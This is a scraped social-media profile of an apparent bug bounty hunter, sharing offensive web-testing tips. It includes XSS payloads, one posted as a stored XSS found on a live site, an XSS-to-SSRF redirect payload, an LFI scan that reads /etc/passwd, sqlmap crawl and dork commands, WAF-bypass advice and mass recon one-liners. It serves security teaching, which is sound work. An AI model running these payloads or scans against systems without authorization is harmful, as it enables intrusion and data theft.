Otterly
@ott3rly
Followers
5,088
Following
240
Media
127
Statuses
951
Bug Bounty Hunger. Helping people to score bounties 💰
Kaunas, Lietuva
Joined November 2016
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
LINGORM PANTENE TRIP
• 632936 Tweets
Bruno Mars
• 603720 Tweets
#ROSÉ_BRUNO_APT
• 338143 Tweets
Wizkid
• 313431 Tweets
APT OUT NOW
• 229463 Tweets
Al Smith
• 163364 Tweets
Corinthians
• 132995 Tweets
Flamengo
• 132751 Tweets
#GMMTVStarlympics2024
• 118698 Tweets
Ruto
• 111992 Tweets
Saints
• 94884 Tweets
Yankees
• 91742 Tweets
Schumer
• 78383 Tweets
Broncos
• 46260 Tweets
NUNEW DEBUT IN JAPAN
• 37638 Tweets
San Marcos
• 34079 Tweets
Lakers
• 32916 Tweets
SB19 PIAYA NG MAYKAPAL
• 32256 Tweets
安倍氏の女装
• 27557 Tweets
対象作品
• 23428 Tweets
Hayırlı Cumalar
• 22597 Tweets
超電ブレイカー
• 21767 Tweets
Dalton Knecht
• 20683 Tweets
ミミッキュ
• 13839 Tweets
集英社秋マンガチャ開催
• 13096 Tweets
Dennis Allen
• 12269 Tweets
フラワー
• 10880 Tweets
Top 3 RXSS payloads I use:
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
#bugbounty
#xss
#bugbountytips
6
131
420
Check out my new blog post: Mass Hunting for Leaked Sensitive Documents
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
10
120
412
File upload functionality could be very dangerous and could easily get you RCE or XSS. It has a large attack surface so it's a pretty interesting thing to look for. I usually use the following regex on burp history to look for those OR just use the word "upload".
#bugbounty
2
56
284
Just a while ago, I found a pretty interesting Stored XSS which was injected by visiting the URL:
https://www\.target\.com/redirectEndpoint.do?redirectPage=redacted&itemFromOrder="'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>
For some
6
50
228
I hate when a top-tier bug bounty hunter mentions on some podcast what he/she prefers checking sensitive areas of the application without mentioning where. A lot of beginners need help figuring out how to start and where to look for common issues. Here is my list of critical
4
51
193
My favorite ways to find API endpoints:
1️⃣ Check if targets have the swagger UI docs using nuclei:
cat targets.txt | nuclei -id swagger-api | anew swagger-ui-endpoints.txt
2️⃣ Bruteforcing using dictionaries like or for better
3
56
188
If you have issues bypassing WAF on POST/PUT/PATCH methods manually, you could try this extension: Absolute game-changer. Credits to
@infosec_au
for bringing this in for public.
#bugbounty
2
58
178
Whenever I see this icon on the website, I always open the browser dev tools console and paste these:
- Intercom('show');
- Intercom('boot',{email:'known_user
@gmail
.com'})
If I can see messages of another person, it is an easy bounty!
#bugbountytips
#bugbounty
#ethicalhacker
6
35
173
Checklist 📝 for exploiting Windows IIS targets:
✅ Detect IIS instances - initial step to build wordlist of potential targets:
1️⃣ Nuclei: cat targets.txt | nuclei -silent -id tech-detect | grep "ms-iis"
2️⃣ Shodan dorks:
- org:"Target inc." product:"IIS"
-
5
64
168
I earned $3000 on
@bugcrowd
.
Tip: always recheck the endpoints collected on the "targets" tab on the burp. After testing certain functionalities, new endpoints could appear which might lead to interesting findings.
#ItTakesACrowd
#bugbounty
#bugbountytip
2
11
163
Check out my new blog post: Mastering Shodan Search Engine
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
3
44
166
Are you tired of seeing similar requests in Burp Suite HTTP history when working with GraphQL endpoints?
Let me show you how to make GraphQL traffic more easily readable:
Using HTTP history filtering options
- Click on the HTTP history filter icon, and fill in your settings.
2
32
151
Want to test for SQLi, RCE, but the target is behind annoying WAF? These are ways to find the origin IP, to bypass WAF restrictions:
✅ Check shodan first. Use ssl: or http.favicon.hash:<HASH> dorks to check if there are any results. This method is the
3
37
138
Sometimes when arjun does not work properly for parameter guessing, I use ffuf instead:
ffuf -u "
https://target\.com/payment.php?FUZZ=regular"
-w ~/wordlists/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
#bugbounty
#bugbountytip
#bugbountytips
5
24
139
Quick LFI check oneliner for a fresh target:
cat targets.txt | (gau || hakrawler || katana || gospider) | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"
#bugbounty
#infosec
2
36
135
One-liner to get subdomains from wayback:
curl -s '
http://web\.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey'
| sed -e 's_https*://__' -e "s/\/.*//" | sed 's/www\.//g' | sed 's/:80//g' | sort -u
#bugbounty
#bugbountytips
#cybersecuritytips
1
28
132
Pretty good writeup about mass leak testing on AWS Docker Images
2
34
125
Use this Shodan filter, to get more recently added hosts:
org:"<Org name>" after:1/1/2024
#BugBounty
#informationsecurity
#infosec
2
33
122
As promised, I am sharing my current checklist 📝 for small scope targets (v0.1):
- API docs/support pages. Explore functionality to understand the app better.
- Plans and pricing. Identify limitations of different plans, your goal will be detecting ways to bypass them.
-
8
31
115
I earned $3,000 for my submission on
@bugcrowd
Tip: always check how the cart handles user input. You can find interesting, business logic errors, injections, etc.
#ItTakesACrowd
#bugbounty
#infosecurity
5
4
109
After playing around with the targeted website, with the proxy on, run this filter to find file uploads:
#bugbounty
#bugbountytip
#bugbountytips
0
17
107
Do you know that sqlmap has its own crawler? Run in the background easily:
sqlmap -u '
https://target\.com'
--crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12
#appsec
#SQLi
#hacking
2
26
106
Tired of seeing those OPTIONS method requests in your burp HTTP history? I have encountered this numerous times, and it has annoyed me a lot. Luckily, I have found the solution. We can use the "HTTP history filter" with "Bambda mode":
1. Go to the proxy tab.
2. On HTTP history,
1
17
104
Base checklist 📝 for exploiting Tomcat servers:
- Detect:
→ Wappalyzer
→ Nuclei
→ Server error - use this to get the version!
→ Response headers
- Test common ports: 8080, 9080, 9443, 9005, 9009, 8082, 8180
- Try clicking on buttons - this is simply stupid but
3
27
102
Check out my new blog post: Port Scanning for Bug Bounties
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
2
30
97
Check out my new blog post: SQLi WAF Bypass Techniques Part 2 &
#8211
; Other Attacks
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
0
26
98
Check out my new blog post: XSS WAF Bypass Techniques
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
0
29
98
Check out my new blog post: Hunting Blind XSS on the Large Scale — Practical Techniques
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
3
18
97
Use these commands to parse waymore/gau or any other URL output to find interesting leads:
1️⃣grep -oP '^https?://(?:[^/]*/){2}' waymore.txt | sort -u | tee root-dirs.txt # This output is good for checking different apps of different domains
2️⃣cat waymore.txt | unfurl keys | awk
4
20
93
Tip: If you are looking for wayback endpoints either by gau or waymore, do not pass the whole subdomain list of a single target. Both of these tools have a subdomain option, use that instead.
#bugbounty
#bugbountytips
#bugbountytip
1
11
89
Check out my new blog post: Recon on Steroids &
#8211
; Discover EVEN MORE Subdomains
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
0
17
88
I earned $950 for my submission on
@bugcrowd
Type: Business logic
Tip: Try bypassing certain limitations, by using double submit. For example, open 2 browser tabs and try submitting both at the same time.
#ItTakesACrowd
#bugbounty
#ethicalhacking
6
4
87
Check out my new blog post: Jump Over Firewall Finding Origin IP
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
0
26
86
Sometimes using Shodan dork :"target" instead of :"" could reveal many more results for the "All in scope" target. Keep in mind that you will need to filter out them later to minimize OOS.
#bugbounty
#shodan
2
17
83
I earned $450 for my submission on
@bugcrowd
Even small bounties stack it up over time!
Tip: Bypass product limits using race conditions. Either use the newest version of burp or turbo intruder plugin.
#ItTakesACrowd
#bugbounty
#bugbountytips
4
5
83
Small tip for those who use xsshunter express as their blind xss framework:
If you want to use import() function for your payloads (which is pretty good for some filter bypasses), you need to change the line 197 of probe.js file to var probe_return_data =
2
12
83
On
@Bugcrowd
, In January, I submitted 6 bugs to 4 programs. Award-wise, it's the most profitable platform so far.
#bugbounty
#TogetherStronger
5
0
82
Check out my new blog post: Using Nuclei At Mass Scale
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
2
24
82
FFUF could be used for fuzzing one endpoint for large amount of alive hosts:
cat alive.txt | grep -v "filter" | ffuf -u
https://FUZZ/endpoint
-w - -fw 1
replace filter and /endpoint with your own :)
#bugbounty
#bugbountytips
#CyberSecurity
1
18
79
Sometimes Excel files could contain PII leaks, so use this Google dork:
site:target\.com inurl:'xlsx'
OR
site:target\.com inurl:'xls'
#ghacking
#googlehacking
#dorking
0
20
78
DotGit Firefox extension could get you some serious P1/P2 vulnerabilities. It's a must-have in your hacker toolkit. Easy bug bounty money!
#bugbounty
#cybersecuritytips
#ethicalhacking
1
6
76
Use this one-liner to get a lot of fuzz endpoints from the crawler:
cat targets.txt | hakrawler -d 5 -dr -insecure -t 10 -timeout 360 | tee hakrawler.txt
#bugbounty
#bugbountytips
#bugbountytip
2
16
76
One-liner of favicon hash for shodan:
python3 -c "import mmh3,requests,codecs;print(mmh3.hash(codecs.encode(requests.get('[URL]',verify=False).content,'base64')))"
Replace URL with and use http.favicon.hash:<HASH>
#bugbounty
#bugbountytips
#infosecurity
2
21
72
Check out my new blog post: SQLi WAF Bypass Techniques Part 1 &
#8211
; Time-Based Attacks
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
0
14
75
Just checked tool from
@dorkipty
. It can gather data from over 100+ search engines and this is a very cool feature. I know this is a pretty fresh tool, so I am looking forward to getting some updates from the team
@fattselimi
@badcrack3r
.
The only thing
2
10
76
Damn, never thought this way. I have always excluded those. I guess this time I will do some checking as well ;)
95% from hunters remove pics from endpoint
my steps
gathering all target endpoints
filter the results just for pic extensions
(cat endpoints.txt | egrep 'jpg|jpeg|png' > results.txt)
filter to live
send results for screenshot tool
1/2
#bugbountytips
#bugbountytip
#bugbounty
30
116
715
2
2
75
I do have an OSCP cert by the way. Has it helped it to my bug bounty success? Not particularly, but I guess it did have some impact on my initial infosec journey. I have eventually transitioned from pen-testing to full-time bug hunting.
#offsec
#oscp
#tryharder
1
2
74
Check out my new blog post: Advanced SQLMap Customization
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
0
22
76
Check out my new blog post: Make Money 💸 Using Google Hacking
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
3
20
74
Get endpoints from the apk file:
apktool d app.apk -o uberApk; grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"#
#g
' | anew | grep -v "w3\|android\|github\|
http://schemas\.android\|google\|http://goo\.gl"
#bugbounty
#appsec
#itsecurity
1
19
73
Base checklist for testing AEM instances 📋:
✅ Identify.
1️⃣ Testing manually
⇒ Check wappalyzer.
⇒ Check the source of page, should see adobe links.
2️⃣ Automated approach
⇒ Google Dorking - site: intitle:content/dam
⇒
0
21
72
One-liner to find sensitive PDF files on Wayback Machine for multiple domains (in the comments)
#bugbountytip
#bugbounty
#informationsecurity
1
13
70
Another one-liner to get crawler endpoints:
cat targets.txt | gospider -S - -q -d 5 -c 10 --sitemap --no-redirect -o gospider.txt
Note: do not use for targets, with too many endpoints, like blogs, e-commerce sites, or social media.
#bugbounty
#bugbountytips
#bugbountytip
1
22
69
One-liner to find JavaScript files quickly using multiple tools:
echo target\.com | (gau || hakrawler || gospider || katana) | grep -iE '.js'| grep -iEv '(.jsp|.json)' | anew js.txt
#bugbounty
#bugbountytips
#hackers
2
22
69
Looks pretty cool. Gonna review this tool on today's stream. This will be a short break from XSS run.
I scanned a bunch of Vulnerability Disclosure Programs to test their APIs using SwaggerJacker for automated api hacking including:
1️⃣Brute forcing for API documentation
2️⃣ Authorization Issues
3️⃣ Automatically generating wordlists
.. and more!
👀👉🏼
8
69
445
2
9
69
A quick one-liner to get most of the wildcard domains of BBPs:
curl -s
https://raw\.githubusercontent.com/projectdiscovery/public-bugbounty-programs/main/chaos-bugbounty-list.json
| jq ".[][] | select(.bounty==true) | .domains[]" -r
#bugbounty
#bugbountytip
#bugbountytips
0
15
68
4 Stages of the Bug Bounty Hunter:
- Learning about Bug Bounty -> Finding the First VALID Bug. Gain foundational knowledge, learn about vulnerabilities, methodologies, and try to identify initial vulnerabilities. Register on one or multiple bug bounty platforms like Hackerone,
4
13
66
Check out my new blog post: Find Sensitive Files with FFUF
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
0
15
65
Tip of the day - add the following flag to httpx to get more results:
-H 'Referer: localhost'
Some servers have checks for headers. You could also experiment with other headers like Origin, X-Forwarded-For and etc.
#bugbounty
#bugbountytips
#infosec
0
17
66
Have a txt file with the list of js endpoints? Use this nuclei command to check for token leaks:
cat js-endpoints.txt | nuclei -tags token,tokens -es info
#bugbounty
#cybersecuritytips
#cybersecurity
1
13
64
Google Dork to check old websites on broad scope target:
"© <company>. All rights reserved." -2024 -2023 -2022
#dorking
#googlehacking
#ghacking
#bugbounty
0
12
65
one-liner to quickly check unusual ports on many hosts using nmap:
nmap -iL hosts.txt -Pn --min-rate 1000 --max-retries 1 --max-scan-delay 20ms -T4 --top-ports 1000 --exclude-ports 80,443,53,22,5060,8080 --open -oG nmap.out
#bugbounty
#networksecurity
#nmap
3
12
62
Quick RXSS check for a fresh target:
cat domains.txt | (gau || hakrawler || gospider || katana) | grep -Ev "\.(jpeg|jpg|png|ico|woff|svg)$" | uro | grep = | qsreplace "<img src=x onerror=prompt()>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=prompt()>"
#bugbounty
#xss
2
6
62
If you are thinking of a good port scanner that is simple and fast, you could check out
https://github\.com/nullt3r/jfscan
I have tested it and it's pretty accurate. Of course, nothing can replace OG Nmap entirely.
#networksec
#netsec
#infosecurity
0
12
63
Use this as a base checklist 📝 when testing cart 🛒functionality:
1️⃣ Is it possible to manipulate prices?
- Try adding minus items.
- Integer overflows.
2️⃣ Test coupon codes.
- Add multiple coupon codes.
- Race conditions
- XSS payloads
3️⃣ postMessage issues.
- Is the event
0
22
63
Check out my new blog post: Turning Wayback Machine Into GOLD MINING MACHINE 💰
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
1
18
62
If you are using gau to fetch some archive data, make sure to exclude a lot of extensions with --blacklist flag:
cat t | gau --subs --blacklist png,jpg,jpeg,gif,mp3,mp4,svg,woff,woff2,etf,eof,otf,css,exe,ttf,eot
#itsecurity
#bugbounty
#informationsecurity
1
10
62
Check out my new blog post: Hunting Blind XSS on the Large Scale — Initial Setup
#BugBounty
#CyberSec
#InfoSec
#Blog
#TogetherWeHitHarder
3
25
61
Use this google dork to detect AEM instances:
site:target\.com inurl:/content/dam/
#bugbounty
#googlehacking
#dorking
1
8
62
A quick way to scan for the s3 bucket list:
s3scanner -bucket-file s3-buckets.txt -threads 16 | grep -aE 'Read|Write|Full' | tee results.txt
#bugbounty
#bugbountytip
#bugbountytips
0
19
61
Make sure you train your brain everyday. Reading writeups helps me to keep up with a game. I do recommend checking this list of Bug Bounty blogs by
@G0LDEN_infosec
.
https://raw\.githubusercontent.com/g0ldencybersec/bugbountybloglist/main/blogs.txt
#bugbounty
#bugbountytips
1
11
61
The options I like to use when getting alive subdomains:
cat domains.txt | httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -sc -cl -title -t 100 -fr -nc | anew alive.txt
0
11
59
Find shodan queries from nuclei public templates locally:
for i in `grep -aR severity ~/nuclei-templates | grep -Eav 'cves.json|TEMPLATES-STATS.json' | grep -aE 'critical|high' | grep -a http | awk -F ':' '/1/ {print $1}'`; do cat $i | grep shodan-query; done
#bugbounty
#hacking
1
10
59
Will start in ~30 minutes. Here is the link:
1
7
59
If you see a preview page editor, board, etc., and you are able to edit it's contents, try placing following payload:
<script>window.location.replace('
https://cnn\.com')</script>
If exported doc contains cnn page, its vulnerable to XSS -> SSRF chain.
#bugbounty
#bugbountytip
1
8
57
Low and Medium vulnerabilities are usually not as interesting as High and Critical ones, but they can definitely serve as the bread and butter for consistent cash flow. If lows and mediums are the bread and butter, highs and crits are the ham and cheese on the top.
3
3
54
Pretty good. I was actually thinking to do something similar ;)
Bug Bounty Hunting Search Engine
I recommend this website to you!
2
109
470
1
6
58
Another useful thing that sqlmap has is the Google Dorking flag. Combine with your favorite dork increase change finding SQLi:
sqlmap -g 'site: inurl:\".php?id=1\"'
#SQLi
#infosecurity
#cybersecurity
1
9
56
You know you had an intense hacking session when your repeater section has that many tabs. Should I update my cover image with this? 😆
8
3
56
Writing a good bug bounty report will result in bigger bounties! There were some cases when I got high severity instead of medium, just because I had put a lot of effort into constructing quality a report. At the end of the day, the human factor plays a big role in bug bounty
4
10
56
As promised, I will start doing some live videos after 1k subscribers. The plan is to do a recon part on YouTube and a hacking part on Discord. The main reason for that - hacking on live targets is pretty grey in terms of service of YouTube.
4
1
57